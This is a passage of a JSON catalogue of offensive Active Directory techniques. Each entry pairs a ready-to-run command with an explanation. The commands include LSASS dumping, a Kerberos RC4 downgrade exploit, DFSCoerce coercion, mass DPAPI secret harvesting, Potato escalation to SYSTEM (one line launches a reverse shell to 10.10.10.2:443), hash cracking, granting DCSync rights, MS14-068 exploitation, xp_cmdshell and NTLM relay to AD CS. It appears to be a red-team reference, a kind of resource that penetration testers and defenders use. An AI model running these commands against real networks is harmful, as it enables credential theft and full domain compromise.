well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:CVE-2022-33679-Downgrade","toolId":"wadcoms:CVE","toolName":"CVE","name":"CVE-2022-33679 Kerberos RC4-MD4 Downgrade","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache","description":"CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache","mitre":[],"requires":["No credentials"],"services":["Kerberos"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:DFSCoerce","toolId":"wadcoms:DFSCoerce","toolName":"DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:DonPAPI-Collect","toolId":"wadcoms:DonPAPI","toolName":"DonPAPI","name":"DonPAPI-Collect","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui","description":"DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:EfsPotato-SeImpersonate","toolId":"wadcoms:EfsPotato","toolName":"EfsPotato","name":"EfsPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2","description":"EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = \\pipe\\efsrpc","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:GodPotato-SeImpersonate","toolId":"wadcoms:GodPotato","toolName":"GodPotato","name":"GodPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"","description":"GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":["T1134.002"],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-ASREPRoast","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-ASREPRoast","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show","description":"Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.004"],"requires":["NTLM hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-DCC2-mscash2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-DCC2-mscash2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show","description":"Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.005"],"requires":["NTLM hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-Kerberoast-TGSREP","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-Kerberoast-TGSREP","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show","description":"Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.003"],"requires":["NTLM hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-NetNTLMv1","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'","description":"Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":[],"requires":["NTLM hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-NetNTLMv2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show","description":"Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["NTLM hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Hashcat-NTLM-secretsdump","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NTLM-secretsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show","description":"Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.002"],"requires":["NTLM hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-dacledit-DCSync","toolId":"wadcoms:Impacket-dacledit","toolName":"Impacket-dacledit","name":"Impacket-dacledit-DCSync","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-DescribeTicket","toolId":"wadcoms:Impacket-describeTicket","toolName":"Impacket-describeTicket","name":"Impacket-DescribeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache","description":"Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache","mitre":[],"requires":["Kerberos ticket"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-FindDelegation","toolId":"wadcoms:Impacket-findDelegation","toolName":"Impacket-findDelegation","name":"Impacket-FindDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GetUserSPNs-NoPreauth","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs-NoPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Credential Access"],"nativeCategory":["Enumeration","Credential Access"],"command":"# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/","description":"GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["No credentials"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GoldenPac","toolId":"wadcoms:Impacket-goldenPac","toolName":"Impacket-goldenPac","name":"Impacket-GoldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Lateral Movement"],"nativeCategory":["PrivEsc","Exploitation","Lateral Movement"],"command":"# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local","description":"Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local","mitre":["T1558"],"requires":["Username","Password"],"services":["Kerberos","SMB"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-MSSQLClient","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Lateral Movement","Enumeration"],"nativeCategory":["Lateral Movement","Enumeration"],"command":"# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth","description":"mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-MSSQLClient-XPCmdShell","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient-XPCmdShell","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell","description":"Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql/execution"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-AddComputer","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-AddComputer","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'","description":"Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-DumpLAPS-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Credential Access","Enumeration"],"nativeCategory":["Discovery","Credential Access","Enumeration"],"command":"# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs","description":"Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-ESC8-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ESC8-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController","mitre":[],"requires":["No credentials"],"services":["NTLM","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-EscalateUser","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-EscalateUser","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john","description":"Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: john","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true,"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed 